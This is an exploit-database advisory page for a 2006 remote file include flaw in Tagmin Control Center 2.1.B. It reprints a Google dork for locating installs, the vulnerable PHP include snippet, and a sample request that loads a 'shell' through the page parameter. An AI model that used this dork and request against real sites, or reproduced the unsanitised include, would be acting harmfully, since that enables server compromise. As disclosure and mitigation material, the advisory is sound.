header-logo
Suggest Exploit
vendor:
Tagmin Control Center
by:
Kernel-32
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Tagmin Control Center
Affected Version From: 2.1.B
Affected Version To: 2.1.B
Patch Exists: NO
Related CWE: N/A
CPE: a:tagmin_cc:tagmin_control_center
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Tagmin C.C 2.1.B Remote File Include

Tagmin Control Center 2.1.B is vulnerable to a Remote File Include vulnerability. An attacker can exploit this vulnerability to include a remote file containing malicious code, resulting in a compromise of the vulnerable system.

Mitigation:

Ensure that user input is validated and sanitized before being used in a file include statement.
Source

Exploit-DB raw data:

 Tagmin C.C 2.1.B Remote File Include
########################################
+Advisory #3
+Product :Tagmin Control Center 2.1.B
+Develop: http://ds3.bbminc.net/tagit2b/
+Dork: inurl:"/tagit2b/"
+Vulnerable: Remote File Include
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable code:
----------------
if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") {
include("$page.php");
}
else {
include("tagviewer.php");
}
?>

---------------
Vulnerable:
http://site/path/index.php?page=shell

# milw0rm.com [2006-09-28]

Navigation

Suggest Exploit

Services By CQR